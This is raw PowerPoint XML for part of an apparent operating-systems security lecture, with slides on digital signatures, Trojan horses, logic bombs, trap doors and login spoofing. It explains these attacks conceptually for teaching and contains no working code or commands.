            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E5902BC6-FE87-4496-8A9E-099C92B6A79E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11266" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Digital Signatures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324466" y="4139380"/>
            <a:ext cx="8426244" cy="2595717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(a) Computing a signature block. (b) What the receiver gets.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Computing a signature block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Sender applies a crypto hash function to the original document to get Hash value, then apply his private key D to get D(Hash). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Verifying the signature block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Receiver applies the same crypto hash function to the original document to get Hash value, then applies sender’s public key E to the signature block to get E(D(Hash)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>If Hash != E(D(Hash)), then the document has been tampered with.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11271" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="443938" y="1338723"/>
            <a:ext cx="8196262" cy="2713038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11272" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="3863770"/>
            <a:ext cx="1028700" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(b)</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ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" smtClean="0"/>
              <a:t>Possible Attacks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12/19/2012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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3739810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Attacks on computer systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trojan horses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logic bombs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trap doors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Worms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spyware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B9C31318-8D1F-46D0-AD3E-FD5CE0C4604B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12528737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8597900" y="6477000"/>
            <a:ext cx="546100" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD953EEB-A6B6-4C95-87AA-87EDF6414D9B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20482" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473379" y="479642"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Operating System Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Trojan Horses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="1981200"/>
            <a:ext cx="8877300" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Free program made available to unsuspecting user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Actually contains code to do harm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Place altered version of utility program on victim's computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>trick user into running that program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36279236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41727794-4595-4D62-9DEB-7A408DD0D85C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22530" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="0"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Logic Bombs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1809750"/>
            <a:ext cx="8686800" cy="5048250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programmer writes (complex) program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wants to ensure that he’s treated well	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embeds logic “flaws” that are triggered if certain things aren’t done, e.g., entering a password daily.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One bomb was triggered if the programmer’s name did not appear on the payroll for two months.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If conditions aren’t met</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program simply stops working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Program may even do damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overwriting data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Failing to process new data (and not notifying anyone)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programmer can blackmail employer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Needless to say, this is highly unethical!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="581025" y="2962275"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20748814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95B1954B-30DD-441E-BC79-AF3CD8506A3E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64514" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Trap Doors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196645" y="5343525"/>
            <a:ext cx="8603226" cy="1057275"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(a) Normal code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(b) Code with a trapdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>inserted; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>User’s access privileges coded into program: username “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>zzzzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>” gets in without a password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64516" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="390525" y="1708230"/>
            <a:ext cx="8153400" cy="3656012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24866355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ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Basics of Security</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{43978029-9DF7-7445-88EF-08A8BCC03D5B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12/19/2012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132A12DE-C9DF-4E32-8049-5119BC7471B3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Login Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1959078" y="2459703"/>
            <a:ext cx="5657850" cy="885825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(a) Correct login screen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>(b) Phony login screen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21511" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="569954" y="1809859"/>
            <a:ext cx="7991475" cy="2430462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="190500" y="4385186"/>
            <a:ext cx="8877300" cy="2472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l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="218768" y="4139381"/>
            <a:ext cx="8686800" cy="27186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62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" lvl="0" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>No difference between real &amp; phony login screens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" lvl="0" indent="-469900" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="]"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
